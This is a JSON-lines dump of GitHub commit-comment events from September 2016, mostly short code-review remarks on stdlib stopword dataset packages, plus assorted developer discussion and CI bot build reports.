{"id":"4591010165","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099989,"position":5,"line":5,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-swe/datapackage.json","commit_id":"c73280090e1ff7e8fcaace2fe195b4a9216c4d3c","created_at":"2016-09-20T16:59:38Z","updated_at":"2016-09-20T16:59:38Z","body":"Remove number."}},"created_at":"2016-09-20T16:59:38Z"}
{"id":"4591010645","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099990,"position":10,"line":10,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-swe/datapackage.json","commit_id":"c73280090e1ff7e8fcaace2fe195b4a9216c4d3c","created_at":"2016-09-20T16:59:43Z","updated_at":"2016-09-20T16:59:43Z","body":"Remove number."}},"created_at":"2016-09-20T16:59:43Z"}
{"id":"4591011102","type":"CommitCommentEvent","actor":{"login":"dgp1130"},"repo":{"name":"uniform-team/Uniform-Validation-Language"},"payload":{"comment":{"id":19099991,"position":6,"line":6,"path":"src/dependable.js","commit_id":"051e60ea75b26efe7ef11c4679a69106b2c6029c","created_at":"2016-09-20T16:59:47Z","updated_at":"2016-09-20T16:59:47Z","body":"`class` is a reserved word. `clazz` is actually pretty common in Java. I just used it here because I couldn't think of anything better. Only alternative would be `c`, but that's just ambiguous."}},"created_at":"2016-09-20T16:59:47Z"}
{"id":"4591011249","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099992,"position":20,"line":20,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-swe/datapackage.json","commit_id":"c73280090e1ff7e8fcaace2fe195b4a9216c4d3c","created_at":"2016-09-20T16:59:49Z","updated_at":"2016-09-20T16:59:49Z","body":"Remove number."}},"created_at":"2016-09-20T16:59:49Z"}
{"id":"4591012066","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099993,"position":45,"line":45,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-swe/datapackage.json","commit_id":"c73280090e1ff7e8fcaace2fe195b4a9216c4d3c","created_at":"2016-09-20T16:59:57Z","updated_at":"2016-09-20T16:59:57Z","body":"Invalid SPDX."}},"created_at":"2016-09-20T16:59:57Z"}
{"id":"4591013103","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099995,"position":10,"line":10,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-swe/lib/index.js","commit_id":"c73280090e1ff7e8fcaace2fe195b4a9216c4d3c","created_at":"2016-09-20T17:00:07Z","updated_at":"2016-09-20T17:00:07Z","body":"Single quotes."}},"created_at":"2016-09-20T17:00:07Z"}
{"id":"4591013769","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099999,"position":4,"line":4,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-swe/package.json","commit_id":"c73280090e1ff7e8fcaace2fe195b4a9216c4d3c","created_at":"2016-09-20T17:00:14Z","updated_at":"2016-09-20T17:00:14Z","body":"Remove number."}},"created_at":"2016-09-20T17:00:14Z"}
{"id":"4591014237","type":"CommitCommentEvent","actor":{"login":"Dawny33"},"repo":{"name":"Dawny33/coala-bears"},"payload":{"comment":{"id":19100001,"position":50,"line":198,"path":"README.rst","commit_id":"2de026621f70a470a52043a4a045440ff7d30ded","created_at":"2016-09-20T17:00:17Z","updated_at":"2016-09-20T17:00:17Z","body":"Oops. Wrong repo.  Would fix 👍 "}},"created_at":"2016-09-20T17:00:17Z"}
{"id":"4591014614","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"ayufan-pine64/linux-pine64"},"payload":{"comment":{"id":19100002,"position":null,"line":null,"path":null,"commit_id":"1671ac4f9a683db050a259df926fb8e169bfc526","created_at":"2016-09-20T17:00:20Z","updated_at":"2016-09-20T17:00:20Z","body":"Just as an information: According to Jared (porting FreeBSD to Pine64 currently) we can turn the upper USB port which is OTG normally (used in host mode -- which has performance implications and maybe stability as well) into a true host port using an own PHY by playing around with some magical bits: https://irclog.whitequark.org/linux-sunxi/2016-09-06#17478535;\r\n\r\nSince nearly none of the average Pine64 users owns the special cable needed to use the upper OTG port in OTG mode I would think adopting this change would make sense.\r\n\r\nPlease drop me a note whether you expect such suggestions for kernel tweaks here or better somewhere else ('upstream' at longsleep's repo for example). Thanks."}},"created_at":"2016-09-20T17:00:20Z"}
{"id":"4591014637","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100003,"position":30,"line":30,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-swe/package.json","commit_id":"c73280090e1ff7e8fcaace2fe195b4a9216c4d3c","created_at":"2016-09-20T17:00:20Z","updated_at":"2016-09-20T17:00:20Z","body":"Remove value."}},"created_at":"2016-09-20T17:00:20Z"}
{"id":"4591021237","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100017,"position":1,"line":1,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-por/LICENSE","commit_id":"90719b1530fa4d815fa4966b8cc77de72867fa5c","created_at":"2016-09-20T17:01:24Z","updated_at":"2016-09-20T17:01:24Z","body":"Addressed incorrectly in a subsequent commit."}},"created_at":"2016-09-20T17:01:24Z"}
{"id":"4591021603","type":"CommitCommentEvent","actor":{"login":"Nagalsky"},"repo":{"name":"Nagalsky/gulpPostCss"},"payload":{"comment":{"id":19100018,"position":null,"line":null,"path":null,"commit_id":"96c69e4d3bb2efefd2a376401847c3051932e831","created_at":"2016-09-20T17:01:28Z","updated_at":"2016-09-20T17:01:28Z","body":"<h1>To start the server</h1>\r\n<p>npm install</p>\r\n<p>bower install</p>\r\n<h3>gulp</h3>"}},"created_at":"2016-09-20T17:01:28Z"}
{"id":"4591022040","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100019,"position":3,"line":3,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-por/README.md","commit_id":"90719b1530fa4d815fa4966b8cc77de72867fa5c","created_at":"2016-09-20T17:01:32Z","updated_at":"2016-09-20T17:01:32Z","body":"Remove number."}},"created_at":"2016-09-20T17:01:32Z"}
{"id":"4591026486","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100035,"position":3,"line":3,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-por/README.md","commit_id":"90719b1530fa4d815fa4966b8cc77de72867fa5c","created_at":"2016-09-20T17:02:17Z","updated_at":"2016-09-20T17:02:17Z","body":"Also, remove the clause specifying how the list should be used. The list could be used in a multiple of contexts, not just NLP. The same goes for all the other stop word lists."}},"created_at":"2016-09-20T17:02:17Z"}
{"id":"4591027497","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100037,"position":21,"line":21,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-por/README.md","commit_id":"90719b1530fa4d815fa4966b8cc77de72867fa5c","created_at":"2016-09-20T17:02:28Z","updated_at":"2016-09-20T17:02:28Z","body":"Remove number and NLP clause."}},"created_at":"2016-09-20T17:02:28Z"}
{"id":"4591028190","type":"CommitCommentEvent","actor":{"login":"ayufan"},"repo":{"name":"ayufan-pine64/linux-pine64"},"payload":{"comment":{"id":19100041,"position":null,"line":null,"path":null,"commit_id":"1671ac4f9a683db050a259df926fb8e169bfc526","created_at":"2016-09-20T17:02:35Z","updated_at":"2016-09-20T17:02:35Z","body":"I would suggest to create an issue for upstream project. It seems like a best place to ask for such things.\r\n\r\n"}},"created_at":"2016-09-20T17:02:35Z"}
{"id":"4591028258","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100042,"position":63,"line":63,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-por/README.md","commit_id":"90719b1530fa4d815fa4966b8cc77de72867fa5c","created_at":"2016-09-20T17:02:36Z","updated_at":"2016-09-20T17:02:36Z","body":"Add license info."}},"created_at":"2016-09-20T17:02:36Z"}
{"id":"4591029102","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100043,"position":5,"line":5,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-por/datapackage.json","commit_id":"90719b1530fa4d815fa4966b8cc77de72867fa5c","created_at":"2016-09-20T17:02:44Z","updated_at":"2016-09-20T17:02:44Z","body":"Remove number."}},"created_at":"2016-09-20T17:02:44Z"}
{"id":"4591029590","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100044,"position":10,"line":10,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-por/datapackage.json","commit_id":"90719b1530fa4d815fa4966b8cc77de72867fa5c","created_at":"2016-09-20T17:02:50Z","updated_at":"2016-09-20T17:02:50Z","body":"Remove number."}},"created_at":"2016-09-20T17:02:50Z"}
{"id":"4591029642","type":"CommitCommentEvent","actor":{"login":"ShadowDragonX"},"repo":{"name":"casillaskhoren1/Streamable-Anime-List"},"payload":{"comment":{"id":19100045,"position":null,"line":null,"path":null,"commit_id":"81815ecb40f6f4ac1ca468be290ea8044a0499ca","created_at":"2016-09-20T17:02:50Z","updated_at":"2016-09-20T17:02:50Z","body":"- Amnesia\r\n- Amnesia OVA"}},"created_at":"2016-09-20T17:02:50Z"}
{"id":"4591030141","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100048,"position":20,"line":20,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-por/datapackage.json","commit_id":"90719b1530fa4d815fa4966b8cc77de72867fa5c","created_at":"2016-09-20T17:02:56Z","updated_at":"2016-09-20T17:02:56Z","body":"Remove number."}},"created_at":"2016-09-20T17:02:56Z"}
{"id":"4591030843","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100049,"position":45,"line":45,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-por/datapackage.json","commit_id":"90719b1530fa4d815fa4966b8cc77de72867fa5c","created_at":"2016-09-20T17:03:03Z","updated_at":"2016-09-20T17:03:03Z","body":"Invalid SPDX."}},"created_at":"2016-09-20T17:03:03Z"}
{"id":"4591031802","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100051,"position":10,"line":10,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-por/lib/index.js","commit_id":"90719b1530fa4d815fa4966b8cc77de72867fa5c","created_at":"2016-09-20T17:03:13Z","updated_at":"2016-09-20T17:03:13Z","body":"Single quotes."}},"created_at":"2016-09-20T17:03:13Z"}
{"id":"4591032551","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100053,"position":4,"line":4,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-por/package.json","commit_id":"90719b1530fa4d815fa4966b8cc77de72867fa5c","created_at":"2016-09-20T17:03:21Z","updated_at":"2016-09-20T17:03:21Z","body":"Remove number."}},"created_at":"2016-09-20T17:03:21Z"}
{"id":"4591033152","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100055,"position":30,"line":30,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-por/package.json","commit_id":"90719b1530fa4d815fa4966b8cc77de72867fa5c","created_at":"2016-09-20T17:03:27Z","updated_at":"2016-09-20T17:03:27Z","body":"Remove value."}},"created_at":"2016-09-20T17:03:27Z"}
{"id":"4591033419","type":"CommitCommentEvent","actor":{"login":"davidgfnet"},"repo":{"name":"X-Ryl669/wifi_display"},"payload":{"comment":{"id":19100056,"position":null,"line":null,"path":null,"commit_id":"0dc18c913191e6037ba3ededcd39074a95d04284","created_at":"2016-09-20T17:03:30Z","updated_at":"2016-09-20T17:03:30Z","body":"Are you able to measure power consumption in your setup? I want to measure it, but the current is too small for a regular voltmeter to measure. Also the dynamic range is quite big: from units for microamp to hundreds of milliamp. That way I could certify whether I'm actually in deep sleep.\r\nBTW, what happens if I have a timer scheduled and I try to go into deep sleep? Will it just wake me when the timer is due? How come then, I get a refresh every 10 min instead of every 30 secs or so? I want to validate this, but my battery (a crappy chinese cheap one) lasts for around 1 week, which is a bit far from what I predicted, but I can't really assume the battery is 2000mAh, it's probably way less."}},"created_at":"2016-09-20T17:03:30Z"}
{"id":"4591035414","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100064,"position":3,"line":3,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fr/README.md","commit_id":"f083d9e648dfd89fe54c9a70e842695f45a887f3","created_at":"2016-09-20T17:03:50Z","updated_at":"2016-09-20T17:03:50Z","body":"Remove usage clause."}},"created_at":"2016-09-20T17:03:50Z"}
{"id":"4591036184","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100067,"position":21,"line":21,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fr/README.md","commit_id":"f083d9e648dfd89fe54c9a70e842695f45a887f3","created_at":"2016-09-20T17:03:59Z","updated_at":"2016-09-20T17:03:59Z","body":"Remove usage clause."}},"created_at":"2016-09-20T17:03:59Z"}
{"id":"4591036732","type":"CommitCommentEvent","actor":{"login":"jamesevickery"},"repo":{"name":"jamesevickery/l293d"},"payload":{"comment":{"id":19100070,"position":null,"line":null,"path":null,"commit_id":"494e42149e000edc26788969af9dc52cfb788889","created_at":"2016-09-20T17:04:04Z","updated_at":"2016-09-20T17:04:04Z","body":"This commit and the previous commit was just me trying to add a folder without adding a file within that folder. I couldn't be bothered to work out how to revert these commits, so please feel free to just ignore them."}},"created_at":"2016-09-20T17:04:04Z"}
{"id":"4591037793","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100072,"position":3,"line":3,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-ger/README.md","commit_id":"50ce1fdb9d8c00d0dea8879e9ecf41b79ad1e256","created_at":"2016-09-20T17:04:15Z","updated_at":"2016-09-20T17:04:15Z","body":"Remove usage clause."}},"created_at":"2016-09-20T17:04:15Z"}
{"id":"4591038692","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100074,"position":21,"line":21,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-ger/README.md","commit_id":"50ce1fdb9d8c00d0dea8879e9ecf41b79ad1e256","created_at":"2016-09-20T17:04:25Z","updated_at":"2016-09-20T17:04:25Z","body":"Remove usage clause."}},"created_at":"2016-09-20T17:04:25Z"}
{"id":"4591040386","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100079,"position":3,"line":3,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-sp/README.md","commit_id":"2aeb0cdc4266c15587c91a8831d8626e6a1042cd","created_at":"2016-09-20T17:04:43Z","updated_at":"2016-09-20T17:04:43Z","body":"Remove usage clause."}},"created_at":"2016-09-20T17:04:43Z"}
{"id":"4591040921","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100080,"position":21,"line":21,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-sp/README.md","commit_id":"2aeb0cdc4266c15587c91a8831d8626e6a1042cd","created_at":"2016-09-20T17:04:49Z","updated_at":"2016-09-20T17:04:49Z","body":"Remove usage clause."}},"created_at":"2016-09-20T17:04:49Z"}
{"id":"4591042555","type":"CommitCommentEvent","actor":{"login":"Grikons"},"repo":{"name":"Grikons/WITALIK-YA-SMOG"},"payload":{"comment":{"id":19100087,"position":null,"line":null,"path":null,"commit_id":"839b0ead7b4928d1036e7ce0a24bfc9b63dca407","created_at":"2016-09-20T17:05:07Z","updated_at":"2016-09-20T17:05:07Z","body":"FF"}},"created_at":"2016-09-20T17:05:07Z"}
{"id":"4591042979","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100089,"position":3,"line":3,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fin/README.md","commit_id":"f813310ffad30dbe664a674ebcedf781cc9d4f77","created_at":"2016-09-20T17:05:12Z","updated_at":"2016-09-20T17:05:12Z","body":"Remove usage clause."}},"created_at":"2016-09-20T17:05:12Z"}
{"id":"4591043624","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100091,"position":21,"line":21,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fin/README.md","commit_id":"f813310ffad30dbe664a674ebcedf781cc9d4f77","created_at":"2016-09-20T17:05:18Z","updated_at":"2016-09-20T17:05:18Z","body":"Remove usage clause."}},"created_at":"2016-09-20T17:05:18Z"}
{"id":"4591046124","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100094,"position":3,"line":3,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-swe/README.md","commit_id":"c73280090e1ff7e8fcaace2fe195b4a9216c4d3c","created_at":"2016-09-20T17:05:32Z","updated_at":"2016-09-20T17:05:32Z","body":"Remove usage clause."}},"created_at":"2016-09-20T17:05:32Z"}
{"id":"4591046810","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19100096,"position":21,"line":21,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-swe/README.md","commit_id":"c73280090e1ff7e8fcaace2fe195b4a9216c4d3c","created_at":"2016-09-20T17:05:39Z","updated_at":"2016-09-20T17:05:39Z","body":"Remove usage clause."}},"created_at":"2016-09-20T17:05:39Z"}
{"id":"4591047104","type":"CommitCommentEvent","actor":{"login":"alimpolat"},"repo":{"name":"alimpolat/test-repo"},"payload":{"comment":{"id":19100098,"position":null,"line":null,"path":null,"commit_id":"41275255174fc5bfd7f4ca791d6c66e1fb973484","created_at":"2016-09-20T17:05:42Z","updated_at":"2016-09-20T17:05:42Z","body":"It is a test-repo"}},"created_at":"2016-09-20T17:05:42Z"}
{"id":"4591048880","type":"CommitCommentEvent","actor":{"login":"jamesevickery"},"repo":{"name":"jamesevickery/l293d"},"payload":{"comment":{"id":19100101,"position":null,"line":null,"path":null,"commit_id":"c4335d65d818e21847d043f938fca6a55d6cf0d7","created_at":"2016-09-20T17:06:02Z","updated_at":"2016-09-20T17:06:02Z","body":"These images were taken from [here](https://business.tutsplus.com/tutorials/controlling-dc-motors-using-python-with-a-raspberry-pi--cms-20051)."}},"created_at":"2016-09-20T17:06:02Z"}
{"id":"4591051848","type":"CommitCommentEvent","actor":{"login":"fpletz"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19100105,"position":null,"line":null,"path":null,"commit_id":"3877ec5b2ff7436f4962ac0fe3200833cf78cb8b","created_at":"2016-09-20T17:06:32Z","updated_at":"2016-09-20T17:06:32Z","body":"This breaks nixos-containers. Removing containers won't be possible because `/var/empty` can't be removed and the error message (Permission denied) is not very helpful because the root cause is the immutable flag.\r\n\r\n@domenkozar Why is the immutable flag needed? Is something modifying this directory's permissions?"}},"created_at":"2016-09-20T17:06:32Z"}
{"id":"4591053815","type":"CommitCommentEvent","actor":{"login":"IAmNotHanni"},"repo":{"name":"inexor-game/audioaugust"},"payload":{"comment":{"id":19100111,"position":null,"line":null,"path":null,"commit_id":"d6d356684f763320297cf095cc26be6a529012c8","created_at":"2016-09-20T17:06:55Z","updated_at":"2016-09-20T17:06:55Z","body":"Isn't that a relaxing sound! :)"}},"created_at":"2016-09-20T17:06:55Z"}
{"id":"4591059197","type":"CommitCommentEvent","actor":{"login":"wence-"},"repo":{"name":"firedrakeproject/firedrake"},"payload":{"comment":{"id":19100117,"position":15,"line":114,"path":"firedrake/solving_utils.py","commit_id":"6c89d8171ebbd696be7193f0e99a709bfe7846a0","created_at":"2016-09-20T17:07:50Z","updated_at":"2016-09-20T17:07:50Z","body":"Do you mean different fails for `LinearSolver` and the variational solvers?  Or do you mean a different error if the inner or the outer solver failed?"}},"created_at":"2016-09-20T17:07:50Z"}
{"id":"4591059782","type":"CommitCommentEvent","actor":{"login":"Garduna1976"},"repo":{"name":"TilesLocalization/resources"},"payload":{"comment":{"id":19100120,"position":null,"line":null,"path":null,"commit_id":"cb3f59c4ed6376e6ae9b1867a2579b25366c4fd3","created_at":"2016-09-20T17:07:56Z","updated_at":"2016-09-20T17:07:56Z","body":"Haha I wish i was done flashing ROMs lol\n\n2016-09-20 18:07 GMT+02:00 rascarlo <notifications@github.com>:\n\n> eheh... I think I am done with AOSP. Lol I even built N just for the fun,\n> but I think I am done. I think...\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/TilesLocalization/resources/commit/cb3f59c4ed6376e6ae9b1867a2579b25366c4fd3#commitcomment-19098955>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVOo18pf2JiYkPmvXBH_wsbGi72k-Eynks5qsATegaJpZM4KBxrH>\n> .\n>\n"}},"created_at":"2016-09-20T17:07:56Z"}
{"id":"4591061139","type":"CommitCommentEvent","actor":{"login":"elifoster"},"repo":{"name":"TheCBProject/CodeChickenLib"},"payload":{"comment":{"id":19100126,"position":null,"line":null,"path":null,"commit_id":"b1341d3ae9b5b0825ca90168151b589a883986fd","created_at":"2016-09-20T17:08:12Z","updated_at":"2016-09-20T17:08:12Z","body":"It might be useful to be able to get the vanilla color enum from one I these enum colors, and vice versa."}},"created_at":"2016-09-20T17:08:12Z"}
{"id":"4591062107","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"ayufan-pine64/linux-pine64"},"payload":{"comment":{"id":19100129,"position":null,"line":null,"path":null,"commit_id":"1671ac4f9a683db050a259df926fb8e169bfc526","created_at":"2016-09-20T17:08:21Z","updated_at":"2016-09-20T17:08:21Z","body":"Ok, will do that."}},"created_at":"2016-09-20T17:08:21Z"}
{"id":"4591065159","type":"CommitCommentEvent","actor":{"login":"machikoyasuda"},"repo":{"name":"elyseholladay/veloute"},"payload":{"comment":{"id":19100136,"position":null,"line":null,"path":null,"commit_id":"e0176f7d1bd057866ea1cc425134ba270bcfc8cf","created_at":"2016-09-20T17:08:53Z","updated_at":"2016-09-20T17:08:53Z","body":"<3 "}},"created_at":"2016-09-20T17:08:53Z"}
{"id":"4591067679","type":"CommitCommentEvent","actor":{"login":"jcwest"},"repo":{"name":"gadresushrut/deck"},"payload":{"comment":{"id":19100143,"position":6,"line":35,"path":"app/scripts/modules/openstack/openstack.module.js","commit_id":"f119aae3acc6119d2a79c11b409212d4cf181172","created_at":"2016-09-20T17:09:20Z","updated_at":"2016-09-20T17:09:20Z","body":"Either explain why commented code is being retained or remove commented code."}},"created_at":"2016-09-20T17:09:20Z"}
{"id":"4591093360","type":"CommitCommentEvent","actor":{"login":"dotnetjunkie"},"repo":{"name":"dotnetjunkie/Mvc"},"payload":{"comment":{"id":19100222,"position":26,"line":26,"path":"src/Microsoft.AspNetCore.Mvc/ApplicationBuilderExtensions.cs","commit_id":"89957e06349ddc3a45977ff19c18d7087ebc6503","created_at":"2016-09-20T17:14:05Z","updated_at":"2016-09-20T17:14:05Z","body":"I’m a bit surprised by this question. The whole idea around the Conforming Container anti-pattern is that there is one container that holds both framework and application components. Without such Conforming Container, or without adhering to it, it means that the the application developer's container only consists of components specific to the application.\r\n\r\nHow did you imagine being ‘non-conforming’ with one single container that is responsible of resolving framework components as well?"}},"created_at":"2016-09-20T17:14:05Z"}
{"id":"4591100279","type":"CommitCommentEvent","actor":{"login":"dorugeber"},"repo":{"name":"firedrakeproject/firedrake"},"payload":{"comment":{"id":19100243,"position":15,"line":114,"path":"firedrake/solving_utils.py","commit_id":"6c89d8171ebbd696be7193f0e99a709bfe7846a0","created_at":"2016-09-20T17:15:22Z","updated_at":"2016-09-20T17:15:22Z","body":"The latter.  If you're writing code that's catching these and trying to recover, probably you want to handle the two cases very differently."}},"created_at":"2016-09-20T17:15:22Z"}
{"id":"4591105275","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19100254,"position":null,"line":null,"path":null,"commit_id":"9787acef2d7e1b23fde84aa50570f26e6cf43f4f","created_at":"2016-09-20T17:16:16Z","updated_at":"2016-09-20T17:16:16Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ckD4CB5-SnOXvr2xL8aNWw"}},"created_at":"2016-09-20T17:16:16Z"}
{"id":"4591110175","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19100270,"position":null,"line":null,"path":null,"commit_id":"8f031955eb692d33084225fc5e864ca0b2c70354","created_at":"2016-09-20T17:17:08Z","updated_at":"2016-09-20T17:17:08Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1784 of 1784 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8f031955eb692d33084225fc5e864ca0b2c70354-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8f031955eb692d33084225fc5e864ca0b2c70354-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T17:17:08Z"}
{"id":"4591114802","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19100294,"position":null,"line":null,"path":null,"commit_id":"f0ad4d118f63f5334be54fab1f77be147491ee5e","created_at":"2016-09-20T17:17:56Z","updated_at":"2016-09-20T17:17:56Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-MacOS-10.9-clang: OK (2325 of 2332 tests passed, 24 test warnings)\n\n * 31 tests had: AUD diffs.\n * 15 tests had: Table small diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: RDD diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0ad4d118f63f5334be54fab1f77be147491ee5e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0ad4d118f63f5334be54fab1f77be147491ee5e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T17:17:56Z"}
{"id":"4591117176","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19100301,"position":null,"line":null,"path":null,"commit_id":"eb63dcd584317a95ae0f59d95935e2247f4b7625","created_at":"2016-09-20T17:18:22Z","updated_at":"2016-09-20T17:18:22Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#QdJuJspTQMuWaLvszmj3Bw"}},"created_at":"2016-09-20T17:18:22Z"}
{"id":"4591118253","type":"CommitCommentEvent","actor":{"login":"FelixGV"},"repo":{"name":"mattwisein/voldemort"},"payload":{"comment":{"id":19100303,"position":null,"line":null,"path":null,"commit_id":"3e4d4b07a0b7600912015ebd29a2c15897bc561f","created_at":"2016-09-20T17:18:34Z","updated_at":"2016-09-20T17:18:34Z","body":"LGTM! Thanks a lot Matt (:"}},"created_at":"2016-09-20T17:18:34Z"}
{"id":"4591121595","type":"CommitCommentEvent","actor":{"login":"GetRektByMe"},"repo":{"name":"Ranobe-Honyaku/Website"},"payload":{"comment":{"id":19100309,"position":null,"line":null,"path":null,"commit_id":"df522d657d142ee08d0508c01e1e4655ac9b3cb8","created_at":"2016-09-20T17:19:09Z","updated_at":"2016-09-20T17:19:09Z","body":".gitattributes; not gitignore"}},"created_at":"2016-09-20T17:19:09Z"}
